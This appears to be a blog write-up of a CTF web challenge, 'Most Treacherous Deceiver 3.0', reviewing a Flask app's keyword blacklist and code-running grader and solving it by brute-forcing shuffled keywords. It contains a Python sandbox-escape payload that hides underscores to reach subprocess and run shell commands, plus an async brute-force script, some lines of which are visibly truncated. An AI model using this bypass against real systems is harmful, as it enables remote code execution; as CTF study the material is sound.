ImaginaryCTF September 2021 - Most Treacherous Deceiver 3.0

Bruteforce when you are too dumb to solve a challenge
Most Treacherous Deceiver 3.0Until now you had it easy. Now withness the power of all (or most) MTD aspects combined: Shifting of detection-, attack-, and prevention-surface! I even implemented 'op code shifting'. Now it changes it's keywords and syntax on a regular basis. How awesome is that? :rooAlphaTank:

I played ImaginaryCTF recently, which is a CTF where challenges are released daily, with scores resetting every month. The challenges were quite fun and I learned how to solve challenges that are not in my forte, such as Crypto.

This web challenge was one of the harder challenges this month (it was valued at 200 points, while others were at ~100 points). It was quite interesting too, since the intended solution varies largely from my solution.

Initial Source Review

From the source we see that the service is a Flask web application, but with two different instances of Flask:

IP = ""
server = Flask(__name__)
controller = Flask(__name__)
cache = Cache()
cache.init_app(app=server, config={"CACHE_TYPE": "FileSystemCache", "CACHE_DIR": Path("/tmp")})
last_token = "last_token"
port = "port"        # attack surface
token = "token"      # detection surface
op_code = "op_code"  # prevention surface
# super secure TRNG
m = getPrime(128)
a = randbelow(m)
c = randbelow(m)
# super secure RSA
p = getPrime(1024)
q = getPrime(1024)

One flask instance is the controller, which runs at port 9003, while the other is the server, which runs at a random port. The initialization of the server is also rather strange:

def defender2000():
    controller_process = None
    while True:
            controller_process = Process(target=start_controller)
            sleep(1) # wait for init to complete
            while True:
                server_process = Process(target=start_server)

So each server only lasts for 3 seconds, after which a new instance of server is created. The different between each instance of server is basically outlined by these functions, mtd_action and mtd_init:

# this is even faster than secrets.randbelow() and still very secure
def next_token(current_token):
    return (a * current_token + c) % m
# RSA and xor?! pliz help
def next_port():
    nonce = int(time()*1000)
    key = randbelow(2**128)
    return (pow(nonce, 0x10001, p*q) ^ nonce) % 2**15 + 2**15
def next_op_code():
    return get_keywords()
def mtd_init():
    with server.app_context():
        cache.set(token, 1)
def mtd_action():
    with server.app_context():
        current_token = cache.get(token)
        cache.set(last_token, current_token)
        cache.set(token, next_token(current_token))
        cache.set(port, next_port())
        cache.set(op_code, next_op_code())

We can see that the token, generated in next_token, is generated successively (indeed, can even be used to find the LCG … which is the intended solution). The controller rarely restarts, so mtd_init is rarely called to reset the token to 1. Why bother with token? Because the goal of this challenge is here:

@server.route("/flag", methods=["GET"])
def get_flag():
    user_token = request.args.get("token")
    current_token = None
    with server.app_context():
        current_token = str(cache.get(token))
    if user_token == current_token:
        return render_template("flag.html")
        return "<p>Please enter a valid token via /flag?token=*your_token*</p>"

So to get the flag, we need to know the token and the randomized port of the server.

To make it easy for us, the controller provides 2 endpoints that leak the token, but creates a new token immediately.

@controller.route("/token", methods=["POST"])
def check_token():
    hint = current_token = 0
    with server.app_context():
        hint = cache.get(last_token)
        current_token = cache.get(token)
    if predicted_token != current_token:
        return jsonify({
            "message": "predictedToken did not match the current token",
            "lastToken": hint, # this is just BM, you can't even use it anymore # lies, we actually use this
            "statusCode": 403
        t = current_token
        for _ in range(int(str(current_token)[1]) + 2):
            t = next_token(t)
        if future_token != t:
            return jsonify({
                "message": "futureToken did not match actual future token",
                "statusCode": 403
            current_op_code = {}
            with server.app_context():
                current_op_code = cache.get(op_code)
            return jsonify({
                    "message": "Wow, you must be a real hacker. \
                    Plese solve these algos for me, I'll even give you my flag.",
                    "algos": "\n".join([str(a) for a in algos]),
                    "opCode": current_op_code

Furthermore, if you manage to guess the token correctly, it gives the current op_code and algos, which are used in a strange endpoint:

@controller.route("/algo", methods=["POST"])
def check_user_algos():
    if not request.is_json:
        return jsonify({
            "message": "only application/json allowed",
            "hint": "*url*, json={*your_data*})",
            "status_code": 400
    user_algos = request.json.get("algos")
    if not user_algos or type(user_algos) is not list or len(user_algos) != 5:
        return jsonify({
            "message": "algos must be of type list and must contain 5 algos",
            "statusCode": 400
        translation = None
        with server.app_context():
            translation = cache.get(op_code)
        for i in range(len(algos)):
            is_same, user_out = check_submission(user_algos[i], algos[i], translation)
            if not is_same:
                return jsonify({
                        "message": f"Sadly algorithm nr. {i} did not work. I really need them to work, so no flag for you.",
                        "statusCode": 400,
                        "algoOutput": "<REDACTED>",
                        "userOutput": user_out
        current_port = None
        with server.app_context():
            current_port = cache.get(port)
        return jsonify({
            "message": f":rooPOG: You did it! Here's your flag:",
            "port": current_port
    except BaseException as e:
        return jsonify({
                "message": "Please don't exploit me :rooNobooli:",
                "statusCode": 500,
                "error": str(e)

Looks like this endpoint takes in some array, algos (more on than later) and tries to run it? Seems like an autograder, since the method is called check_submission.

Strange Functions

Before we get to check_submissions, we should probably see this:

normal_keywords = ['False', 'None', 'True', 'and', 'as', 'assert', 'async', 'await', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return', 'try', 'while', 'with', 'yield']
keyword_blacklist = ["import", "with", "as", "from"]
blacklist = ["_", "eval", "exec", "open", "flag", "globals", "builtins"]
def get_keywords(shuffle=True):
	values = normal_keywords.copy()
	if shuffle:
		# super secure shuffle algo
		for i in range(len(values)):
			val = choice(values[i:])
	return {key:values.pop() for key in normal_keywords}

What it seems to be doing is just shuffling a list of Python keywords then creating a mapping between the keyword and its shuffled counterpart. This function was used in next_op_code, and the results are saved in mtd_init to op_code, so the shuffling is unique for every server instance.

Okay, more on how this op_code is used in the check_submission method:

def check_submission(user_input, algo, translation):
	user_algo = b64decode(user_input).decode()
	user_algo = translate(user_algo, translation)
	file_name = "".join([choice("0123456789abcdef") for _ in range(32)]) + ".py"
	save_location = "submits/" + file_name
	import_name = save_location[:-3].replace("/", ".")
	pycache_folder = "submits/__pycache__/"
	with open(save_location, "w") as file:
	# much IO async, such programmer skillz
	# if you encounter 'module not found', you got unlucky, just try again (for real)
	# it works so leave me be with "clean code" and "best practices", you can't stop me!
	ret = None
		m = import_module(import_name)
		ret = algo.check(m.f)
	except BaseException as e:
		ret = False, str(e)
	# remove files; much IO async, such programmer skillz
		for f in listdir(pycache_folder):
			remove(path.join(pycache_folder, f))
	except BaseException as e:
	return ret

From check_user_algos above, we see that this method is called with these arguments:

is_same, user_out = check_submission(user_algos[i], algos[i], translation)

where translation is the current op_code, and algos[i] is each of the 5 elements of the current algos (from the cache), and user_algos[i] is from a parameter (the algos parameter) that we can control.

A brief summary of what the function does is that after calling translate(base64_decode(user_input), op_code), the result is saved in a random file, then imported (and presumably executed, per the autograder idea, then the output is checked according to the alog). This is literally a RCE, so let’s see why this challenge has high points:

def translate(user_function, translation, translate_back=True):
	the user_function should look like the following (with a newline at the end):
	def f(lst):
		return X
	# it does not matter if the algo hangs, i.e. contains a "while True:"
	# the server just restarts and your submission is not validated!
	# much DoS protection, such wow!
	if len(user_function) > 1000:
		raise Exception("[!]Your submission has to be at most 1000 chars!")
	for word in blacklist:
		if word in user_function:
			raise Exception(f"[!] Word in blacklist: {word}")
	parsed = ""
	current_word = ""
	in_blacklist = False
	end_of_word = False
	contains_return = False
	for c in user_function:
		if c in " \n\t\r\"=':,*/+-{}()[]":
			if current_word in translation:
				current_word = translation[current_word]
				if current_word == "return":
					contains_return = True
			# after translation check if blacklisted!
			if translate_back and current_word in keyword_blacklist:
				raise Exception(f"[!] Word in keyword blacklist: {current_word}")
			end_of_word = False
			parsed += current_word + c
			current_word = ""
			current_word += c
	if translate_back and not parsed.startswith("def f(lst):\n"):
		raise Exception("[!] Your submission must start with 'def f(lst):\\n'")
	if translate_back and not contains_return:
		raise Exception("[!] Your submission must return something.")
	return parsed

Oh well, here’s where the randomly shuffled op_code comes into play: It maps Python keywords to other keywords.

Our user_input cannot contains words in the blacklist = ["_", "eval", "exec", "open", "flag", "globals", "builtins"], or contain certain keywords such as keyword_blacklist = ["import", "with", "as", "from"]. Furthermore, the user_input must start with def f(lst):\n and contain at least one return.

The issue? def and return are part of the python keywords that are shuffled, so we need to either know the translation (op_code), the intended solution, or guess. But after that? We have RCE as long as do not get hit by the above rules.

There is also an example of a user_input that runs:

def test():
	from base64 import b64encode
	from algo import algos
	test_function = """yield f(lst):
	print("[#] Ex3cut1ng the us3r funct10n.")
	d = {'a': 1}
	maxOddInt = 0
	try l while lst:
		elif type(l) return int not l % 2 == 1 not l > maxOddInt:
			maxOddInt = l
		elif l return lambda with:
			else # ok, strange
		from l:
				x = 1 / 0
			False BaseException:
	print("[#] R3turning fr0m the us3r funct10n.")
	continue maxOddInt
print("[#] Imp0rting the us3r funct10n.")
	test_translation = {
		'return': 'is',
		'yield': 'def'
	test_function = b64encode(test_function.encode()).decode()
	return check_submission(test_function, algos[0], test_translation)

Unintended Solution

We know that the server restarts every 3 seconds, and gets a new value of op_code, and we have 2 keywords to guess. The length of all the keywords is len(normal_keywords) = 35. Thus, we have a 1/35 chance of guessing the correct translation of def, and 1/34 chance of guessing the correct translation of return: which is 1/1190, which are nice odds.

So we can indeed brute-force the server with a guessed opcode but we have to find an efficient way to do it. Python’s request is horrendously slow, so we have to use aiohttp instead. The payload we send has to fit the above requirements as well, and work one-shot.

The payload is the typical python3 SSTI payload, but modified due to the constraints e.g. since _ is banned, I used getattr with encoded strings to access fields.

"''.__class__.__mro__[1].__subclasses__[279]('<some command>', shell=True, stdout=-1).communicate()[0].strip()"

modified to =>

"str(getattr( getattr(getattr('', '__class__'), '__mro__')[1], '__subclasses__' )()[279]('cat templates/fl\\x61g.html', shell=bool(1), stdout=-1).communicate()[0].strip() )".replace("_", "\\x5f")

Note that the constant 279 wildly differs between python versions and can be affected by imports. It needs experimentation if you need to use it for other challenges.

The final solution script is as below:

import requests
from pwn import *
import json
import aiohttp, asyncio, async_timeout
url = ""
normal_keywords = ['False', 'None', 'True', 'and', 'as', 'assert', 'async', 'await', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return', 'try', 'while', 'with', 'yield']
async def get_url(session, def_kw, return_kw):
    res = ""
    exec = "str(getattr( getattr(getattr('', '__class__'), '__mro__')[1], '__subclasses__' )()[279]('cat templates/fl\\x61g.html', shell=bool(1), stdout=-1).communicate()[0].strip() )".replace("_", "\\x5f")
    algo = f"""{def_kw} f(lst):
        {return_kw} {exec}
    algo = base64.b64encode(algo.encode()).decode()
    async with + "algo", json = { "algos": [algo, algo, algo, algo, algo] }) as response:
        while True:
            chunk = await
            if not chunk:
            res += str(chunk)
        await response.release()
    if "ictf" in res:
    return len(res)
async def async_payload_wrapper(async_loop):
    async with aiohttp.ClientSession(loop=async_loop) as session:
        corou_to_execute = [get_url(session, def_kw, return_kw) for return_kw in normal_keywords for def_kw in normal_keywords]
        await asyncio.gather(*corou_to_execute)
if __name__ == '__main__':
    while True:
        event_loop = asyncio.get_event_loop()

Intended Solution


LCG is supposedly some Crypto concept, so I haven’t bother reimplementing my solution yet. Other solvers noted that the algos that they received from the server were confusing to implement, so I managed to dodge a bullet ;)


Overall, this was a pretty nice challenge that has quite some unintended solutions (the first solver did RCE too, but after he figured out the LCG and the op_code so that he didn’t have to bruteforce), and was quite nice to solve too. Here’s to wishing for more interesting Web challenges.